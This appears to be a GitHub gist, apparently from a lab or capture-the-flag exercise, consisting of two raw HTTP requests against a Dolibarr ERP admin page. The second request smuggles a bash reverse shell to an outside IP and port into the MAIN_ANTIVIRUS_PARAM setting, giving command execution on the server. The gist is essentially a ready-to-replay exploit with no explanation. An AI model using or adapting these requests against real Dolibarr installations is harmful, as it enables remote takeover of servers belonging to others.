Skip to content

Instantly share code, notes, and snippets.

@sharpicx
Created March 5, 2024 04:13
Show Gist options
  • Save sharpicx/cca87579425d9546e603b45686c0d782 to your computer and use it in GitHub Desktop.
Save sharpicx/cca87579425d9546e603b45686c0d782 to your computer and use it in GitHub Desktop.
dolibarr - puffy
POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.2.120/erp/admin/security_file.php
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------214479305914244921141324238339
Content-Length: 865
-----------------------------214479305914244921141324238339
Content-Disposition: form-data; name="section_dir"
-----------------------------214479305914244921141324238339
Content-Disposition: form-data; name="section_id"
0
-----------------------------214479305914244921141324238339
Content-Disposition: form-data; name="token"
c2bf19bb9927006593e01e8cd1e08e10ef7a8605
-----------------------------214479305914244921141324238339
Content-Disposition: form-data; name="max_file_size"
2097152
-----------------------------214479305914244921141324238339
Content-Disposition: form-data; name="userfile[]"; filename="test.log"
Content-Type: text/x-log
foobarr
-----------------------------214479305914244921141324238339
Content-Disposition: form-data; name="sendit"
Send file
-----------------------------214479305914244921141324238339--
POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.1.2.120/erp
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Length: 221
Connection: close
action=updateform&MAIN_UPLOAD_DOC=2048&MAIN_UMASK=0664&MAIN_ANTIVIRUS_COMMAND=test&MAIN_ANTIVIRUS_PARAM=%3B%2Fbin%2Fbash+-c+%27%2Fbin%2Fbash+-i+%26%3E+%2Fdev%2Ftcp%2F10.18.200.131%2F4444+0%3C%261+2%3E%261%27&button=Modify
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment